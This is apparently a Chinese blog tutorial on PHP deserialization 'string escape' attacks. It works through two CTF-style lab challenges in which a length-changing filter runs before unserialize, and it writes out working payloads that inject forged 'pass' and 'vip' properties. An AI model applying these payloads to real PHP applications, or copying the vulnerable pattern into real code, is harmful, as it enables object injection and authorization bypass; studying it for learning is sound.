php反序列化学习——字符串逃逸

最新推荐文章于 2024-04-25 15:49:58 发布
最新推荐文章于 2024-04-25 15:49:58 发布
阅读量1k 收藏 22
点赞数 18
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756016/article/details/136684052
版权

一.字符串可逃逸的基础

反序列化分隔符
反序列化以;}结束,后面的字符串不影响正常的反序列化

属性逃逸
一般在数据先经过一次serialize再经过unserialize,在这个中间反序列化的字符串变多或者变少的时候有可能存在反序列化属性逃逸。

对于PHP反序列字符逃逸,我们分为以下两种情况进行讨论。

过滤后字符变多

过滤后字符变少

二.例题

字符串变多

<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($name){
    $safe=array("flag","php");
    $name=str_replace($safe,"hack",$name);
    return $name;
}
class test{
    var $user;
    var $pass='daydream';
    function __construct($user){
        $this->user=$user;
    }
}
$param=$_GET['param'];
$param=serialize(new test($param));
$profile=unserialize(filter($param));

if ($profile->pass=='escaping'){
    echo file_get_contents("flag.php");
}
?>

先分析一下这里需要让pass的值为escaping

但是class类里赋了pass='daydream'

所以我们的思路就是要让后面的pass='daydream'被注释掉

通过控制可控的变量user 给pass赋值为escaping

代码分析

<?php

function filter($name)
{
  $safe = array("flag", "php");
  $name = str_replace($safe, "hack", $name);//把flag或者php变为hack 这里我们只能利用php 因为flag和hack长度一样 不会出现逃逸
  return $name;//这里先判断出字符串长度是增加了
}
class test
{
  var $user;
  var $pass = 'daydream';
  function __construct($user)
  {
    $this->user = $user;
  }
}
$param = $_GET['param'];
$param = serialize(new test($param));
$profile = unserialize(filter($param));

if ($profile->pass == 'escaping') {//如果这里pass的值为escaping
  echo file_get_contents("flag.php");//显示文件flag.php
}

构造payload

<?php

function filter($name)
{
  $safe = array("flag", "php");
  $name = str_replace($safe, "hack", $name); //把flag或者php变为hack 这里我们只能利用php 因为flag和hack长度一样 不会出现逃逸
  return $name; //这里先判断出字符串长度是增加了
}
class test
{
  var $user;
  var $pass = 'escaping';
  function __construct($user)
  {
    $this->user = $user;
  }
}
$param = 'phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}';
$param = serialize(new test($param));
$a = filter($param);
//$profile = unserialize(filter($param));

echo $a;//O:4:"test":2:{s:4:"user";s:3:"hack";s:4:"pass";s:8:"daydream";}
//这里的php已经变成flag了
//但是字符串长度还是3 
//这里的思路也是通过构造让后面的k变成‘ ";s:4:"pass";s:8:"escaping";} ’
//让后面的";s:4:"pass";s:8:"daydream";}被注释掉
//$param = 'phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}'

这里的通过filter($param)

php已经变成flag了
但是字符串长度还是3
这里的思路也是通过构造让后面的k变成‘ ";s:4:"pass";s:8:"escaping";} ’(29个字符)说明我们前面应该有29个php
让后面的";s:4:"pass";s:8:"daydream";}被注释掉
$param = 'phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}'

输出结果

O:4:"test":2:{s:4:"user";s:116:"hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack";s:4:"pass";s:8:"escaping";}";s:4:"pass";s:8:"escaping";}

这里正好hack...是116个字符

证明我们构造成功

字符串减少

<?php
function filter($name){
    $safe=array("flag","php");
    $name=str_replace($safe,"hk",$name);//调用fliter函数把里面含有flag或者php字符串的堵换成hk
    return $name;
}
class test{
    var $user;
    var $pass;
    var $vip = false ;
    function __construct($user,$pass){
        $this->user=$user;
    $this->pass=$pass;
    }
}
$param=$_GET['user'];
$pass=$_GET['pass'];
$param=serialize(new test($param,$pass));
$profile=unserialize(filter($param));

if ($profile->vip){
    echo file_get_contents("flag.php");
}
?>

分析

当vip为的值为真值时 显示flag.php

所以我们要控制可控变量使vip的布尔值为真

把后面vip为假的时候注释掉

这里把flag 或者php替代成hk 可以减少一个或者两个字符

这里以flag为例(减少一半工程量)

<?php
function filter($name)
{
  $safe = array("flag", "php");
  $name = str_replace($safe, "hk", $name);
  return $name;
}

class test
{
  var $user;
  var $pass;
  var $vip = false;
  function __construct($user, $pass)
  {
    $this->user = $user;
    $this->pass = $pass;
  }
}

// $param = 'flagflag'; // $_GET['user'];
// $pass = 'b'; //$_GET['pass'];

$param = 'flagflagflagflagflagflagflagflagflagflag';
$pass = '1";s:4:"pass";s:1:"b";s:3:"vip";b:1;}';

$param = serialize(new test($param, $pass)); //把$param和$pass的值赋值给$user和$pass  //O:4:"test":3:{s:4:"user";s:1:"a";s:4:"pass";s:1:"b";s:3:"vip";b:0;}
//echo $param;
 $a = filter($param);
 echo $a;//O:4:"test":3:{s:4:"user";s:8:"hkhk";s:4:"pass";s:1:"b";}
//这里user的字符串已经从flagflag 替换成了hkhk 但是字符串长度还是8 这样 他就会以为user里面的内容为‘hkhk";s:’
//如果我们通过构造使其里面的内容为'hkhk";s:4:"pass";s:xx:"' 这样我们通过构造可控变量pass的值 让它后面变成s:3:"vip";b:1;}
//反序列化时候检查到;}就会结束  就相当于后面s:1:"b";}被我们注释掉了
//pass=1";s:4:"pass";s:1:"b";s:3:"vip";b:1;}
//param=flagflagflagflagflagflagflagflagflagflag

这里user的字符串已经从flagflag 替换成了hkhk 但是字符串长度还是8 这样 他就会以为user里面的内容为‘hkhk";s:’
如果我们通过构造使其里面的内容为'hkhk";s:4:"pass";s:xx:"' 这样我们通过构造可控变量pass的值 让它后面变成s:3:"vip";b:1;}
反序列化时候检查到;}就会结束  就相当于后面s:1:"b";}被我们注释掉了

payload:
pass=1";s:4:"pass";s:1:"b";s:3:"vip";b:1;}
param=flagflagflagflagflagflagflagflagflagflag

输出

O:4:"test":3:{s:4:"user";s:40:"hkhkhkhkhkhkhkhkhkhk";s:4:"pass";s:37:"1";s:4:"pass";s:1:"b";s:3:"vip";b:1;}";s:3:"vip";b:0;}

 巧妙构造user = ‘ hkhkhkhkhkhkhkhkhkhk";s:4:"pass";s:37:"1 ’

表示我们构造成功

over

阿呆不呆@qq
关注
  • 18
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php反序列化字符逃逸
leekos的博客,分享web安全相关知识~
01-04 1206
php反序列化字符逃逸
反序列化中的字符逃逸问题
XYH_233的博客
03-27 265
php反序列化中的字符逃逸问题
php反序列化逃逸
最新发布
m0_63416413的博客
04-25 500
ctf反序列化逃逸,结合代码和ctf题目
php反序列化-字符逃逸看这一篇就够了
cike_y
03-08 958
php反序列化字符逃逸-缩短逃逸、增长逃逸
PHP反序列化
weixin_59762059的博客
06-21 2284
PHP反序列化
PHP反序列化字符串逃逸
qing_chuan_的博客
08-06 233
PHP序列化:serialize()序列化是将变量或对象转换成字符串的过程,用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。而PHP反序列化:unserialize()反序列化是将字符串转换成变量或对象的过程通过序列化与反序列化我们可以很方便的在PHP中进行对象的传递。本质上反序列化是没有危害的。但是如果用户对数据可控那就可以利用反序列化构造payload攻击。
JavaScript实现的反序列化json字符串操作示例
10-18
总结,本文通过实例介绍了JavaScript中反序列化JSON字符串的两种方法——`eval`和`JSON.parse`,并强调了使用`JSON.parse`的优越性和安全性。同时,还分享了几款在线JSON工具,帮助开发者更好地处理JSON数据。希望...
JSON PHP中,Json字符串反序列化成对象/数组的方法
10-18
今天小编就为大家分享一篇JSON PHP中,Json字符串反序列化成对象/数组的方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
C#实现JSON字符串序列化与反序列化的方法
08-31
本文将详细讲解如何使用C#实现JSON字符串的序列化和反序列化。 首先,我们要了解序列化和反序列化的概念。**序列化**是将对象转换为可存储或可传输的格式,例如JSON字符串;**反序列化**则是将这种格式的数据恢复为...
php反序列化学习字符串逃逸
oyf3085227433的博客
02-13 1155
学习一下php反序列化字符串逃逸的知识点
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
主要介绍了0CTF-2016-piapiapia(php反序列化长度变化尾部字符串逃逸),本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
PHP反序列化总结
weixin_44449397的博客
01-19 439
去年我首发在先知社区的文章,现在把它转载过来php反序列化完整总结 - 先知社区 (aliyun.com)花些时间把四种常见的php反序列化总结了一遍,各自都找了简单示例和例题,参考了一些师傅的链接加上自己的理解,参考链接放在文末。
Web攻防10_PHP反序列化_概念&魔术方法&POP链构造
学废了的阿串的博客
04-11 855
PHP反序列化概念,为什么要反序列化,魔术方法与序列化的关系,反序列化漏洞原理与危害,漏洞利用POP链构造
php反序列化字符串逃逸
2301_80913334的博客
03-30 1264
字符增多逃逸:第一个字符串增多吐出多余代码,把多余位代码构造成逃逸的成员属性,构造出一个逃逸成员属性字符减少逃逸:第一个字符串减少吃掉有效代码,在第二个字符串构造代码,多逃逸出一个成员属性做题顺序:1、找目标;2、构造所需的有效代码;3、将构造出的有效代码作为值赋值给属性。
php反序列化之字符逃逸
qq_53856457的博客
05-14 1615
php反序列化之字符逃逸法 1.按我的理解,反序列化的过程就是碰到;}与最前面的{配对后,便停止反序列化。如下序列化: <?php class Test { public $a = "aa"; public $b = "bbb"; public $c = "cccc"; } $qwe = new Test(); echo serialize($qwe); 输出序列化结果为:O:4:“Test”:3:{s:1:“a”;s:2:“aa”;s:1:“b”;s:3:“bbb”;s:1:“c”;
php反序列化--字符串逃逸
YkingH的博客
03-14 5081
php反序列化字符串逃逸 PHP反序列化字符串逃逸,一共分有两种情况,情况一:过滤后字符串变多,情况二:过滤后字符变少(本篇文章默认已有反序列化相关知识基础) 过滤后字符串变多 以ctfshow-web262为例讲解: error_reporting(0); class message{ public $from; public $msg; public $to; public $token='user'; public function __construct(
web学习(php反序列化长度变化尾部字符串逃逸)
weixin_44897902的博客
11-02 1162
BUUCTF piapiapia(php反序列化长度变化尾部字符串逃逸) 引用: https://blog.csdn.net/zz_Caleb/article/details/96777110 前提知识: md5(Array()) = null sha1(Array()) = null ereg(pattern,Array()) = null preg_match(pattern,Ar...
0CTF-2016-piapiapia(php反序列化长度变化尾部字符串逃逸)
Sea_Sand息禅
07-21 6485
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: index.php <?php require_once('class.php'); if($_SESSION['username']) { header('Location: profile.php'); exit; } if($_POST['username'] && $...
php反序列化字符串逃逸是什么
02-07
PHP 中,反序列化是指将序列化的字符串转换为原来的 PHP 对象。但是,如果字符串中含有恶意代码,反序列化过程就可能导致漏洞的产生。这种情况就称为“反序列化字符串逃逸”。 举个例子,假设你有一个函数可以将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值